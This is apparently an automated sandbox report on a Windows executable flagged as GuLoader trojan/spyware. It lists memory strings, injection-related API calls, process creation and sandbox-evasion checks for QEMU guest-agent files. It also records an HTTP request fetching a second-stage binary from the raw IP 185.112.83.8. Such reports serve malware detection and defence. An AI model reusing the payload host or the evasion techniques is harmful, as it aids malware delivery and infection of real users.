                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_pdf
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_quicktime
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_real
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_shockwave
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_wmp
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                        Source: GR8jRQeRUr.exeString found in binary or memory: https://www.digicert.com/CPS0
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591029105.000000001E96F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590648971.000000001E7EA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590799521.000000001E8AE000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591267383.000000001EAB0000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591318944.000000001EAFB000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583560791.000000001F89D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583621640.000000001F90F000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591722392.000000001F7DA000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000003.583684692.000000001F980000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591069977.000000001E985000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591648322.000000001F769000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                        Source: global trafficHTTP traffic detected: GET /RamzersStubed.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 185.112.83.8Cache-Control: no-cache
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_004056DE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004056DE
                        Source: GR8jRQeRUr.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040755C0_2_0040755C
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_00406D850_2_00406D85
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E41BFF0_2_72E41BFF
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294663A0_2_0294663A
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947BC00_2_02947BC0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294AF3F0_2_0294AF3F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294708D0_2_0294708D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029402A20_2_029402A2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946CE30_2_02946CE3
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029494140_2_02949414
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029472190_2_02947219
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294700B0_2_0294700B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294607E0_2_0294607E
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946A7B0_2_02946A7B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029479D20_2_029479D2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029479C20_2_029479C2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029471F80_2_029471F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029469EB0_2_029469EB
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029471540_2_02947154
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294A1520_2_0294A152
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294637F0_2_0294637F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02949F6F0_2_02949F6F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000644F815_2_000644F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000609C015_2_000609C0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00064A3015_2_00064A30
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00062A4815_2_00062A48
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00065BA015_2_00065BA0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00069E5015_2_00069E50
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0006E5C915_2_0006E5C9
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00064D6015_2_00064D60
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A612F15_2_000A612F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A6B0015_2_000A6B00
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000AED6015_2_000AED60
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A717015_2_000A7170
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A97F815_2_000A97F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000A980815_2_000A9808
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00105C5815_2_00105C58
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00107FB815_2_00107FB8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00102FE815_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0010B01F15_2_0010B01F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00102FE815_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_00102FE815_2_00102FE8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294663A NtWriteVirtualMemory,0_2_0294663A
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294AA46 LoadLibraryA,NtProtectVirtualMemory,0_2_0294AA46
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947BC0 NtAllocateVirtualMemory,0_2_02947BC0
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294708D NtWriteVirtualMemory,0_2_0294708D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029402A2 NtWriteVirtualMemory,0_2_029402A2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946CE3 NtWriteVirtualMemory,0_2_02946CE3
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947219 NtWriteVirtualMemory,0_2_02947219
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294700B NtWriteVirtualMemory,0_2_0294700B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294723B NtWriteVirtualMemory,0_2_0294723B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294607E NtWriteVirtualMemory,0_2_0294607E
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02946A7B NtWriteVirtualMemory,0_2_02946A7B
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029471F8 NtWriteVirtualMemory,0_2_029471F8
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029469EB NtWriteVirtualMemory,0_2_029469EB
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02947154 NtWriteVirtualMemory,0_2_02947154
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294637F NtWriteVirtualMemory,0_2_0294637F
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess Stats: CPU usage > 98%
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpBinary or memory string: OriginalFilename vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmpBinary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSacrifices.exe4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilename_.dll4 vs GR8jRQeRUr.exe
                        Source: GR8jRQeRUr.exeStatic PE information: invalid certificate
                        Source: GR8jRQeRUr.exeVirustotal: Detection: 13%
                        Source: GR8jRQeRUr.exeReversingLabs: Detection: 15%
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile read: C:\Users\user\Desktop\GR8jRQeRUr.exeJump to behavior
                        Source: GR8jRQeRUr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe"
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess created: C:\Users\user\Desktop\GR8jRQeRUr.exe "C:\Users\user\Desktop\GR8jRQeRUr.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040352D EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040352D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile created: C:\Users\user\AppData\Local\YandexJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile created: C:\Users\user\AppData\Local\Temp\nstAA59.tmpJump to behavior
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@0/2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile read: C:\Users\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0040498A GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_0040498A
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                        Source: GR8jRQeRUr.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                        Source: Binary string: _.pdb source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp

                        Data Obfuscation:

                        barindex
                        Yara detected GuLoaderShow sources
                        Source: Yara matchFile source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000000.404230350.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E430C0 push eax; ret 0_2_72E430EE
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02944E91 push ss; iretd 0_2_02944E94
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029438A6 push cs; ret 0_2_029438AF
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02945C10 push ds; ret 0_2_02945C11
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294080B push cs; iretd 0_2_02940879
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_0294027C push ds; iretw 0_2_0294027E
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_02940263 push ds; iretw 0_2_02940265
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029407F2 push cs; iretd 0_2_02940879
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_029423EE push ebx; retf 0_2_02942417
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0006B530 push esp; iretd 15_2_0006B539
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000AD4D0 push cs; ret 15_2_000AD4E4
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_000AF950 push eax; iretd 15_2_000AF95D
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0010099C push 418B000Dh; ret 15_2_001009A2
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 15_2_0012A721 push ds; ret 15_2_0012A730
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeCode function: 0_2_72E41BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_72E41BFF
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile created: C:\Users\user\AppData\Local\Temp\nszAAC8.tmp\System.dllJump to dropped file
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion:

                        barindex
                        Tries to detect Any.runShow sources
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
                        Source: C:\Users\user\Desktop\GR8jRQeRUr.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
